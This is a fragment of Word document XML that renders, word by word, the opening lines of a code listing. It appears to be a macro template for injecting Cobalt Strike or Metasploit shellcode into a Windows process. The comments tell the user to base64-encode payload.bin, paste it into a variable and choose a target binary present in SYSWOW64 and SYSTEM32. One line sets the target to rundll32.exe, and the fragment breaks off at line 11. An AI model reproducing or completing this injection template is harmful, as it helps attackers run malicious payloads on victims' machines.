          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>want</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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Tested:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cobalt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>St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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>rike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Run:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="354" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="3446" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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Copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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encoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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variable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1475" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>want</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>anything</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="29"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>that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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SYSWOW64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SYSTEM32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="338" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="6169" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"rundll32.exe"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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38" w:after="0" w:line="338" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="6480" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
